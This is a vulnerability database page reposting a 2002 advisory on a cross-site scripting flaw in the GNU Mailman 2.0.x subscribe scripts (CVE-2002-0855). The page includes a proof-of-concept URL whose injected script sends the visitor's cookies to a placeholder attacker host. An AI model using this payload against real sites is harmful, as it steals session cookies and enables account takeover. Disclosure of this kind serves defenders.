Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2002-0855

Publish Date: 24 Jul 2002

Author: office

                							

                source: http://www.securityfocus.com/bid/5298/info

GNU Mailman is prone to a cross-site scripting vulnerability. Arbitrary HTML and script code are not sanitized from the URI parameters of mailing list subscribe scripts.

An attacker may exploit this issue by creating a malicious link containing arbitrary script code and enticing a web user to visit the link.

http://target/mailman/subscribe/ml-name?info=&lt;script&gt;document.location%3D"http://attackerhost/attackerscript.cgi?"%2Bdocument.cookie;&lt;/script&gt;

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

GNU Mailman 2.0.x - Subscribe Cross-Site Scripting

Vulmon Search

About

Products

Connect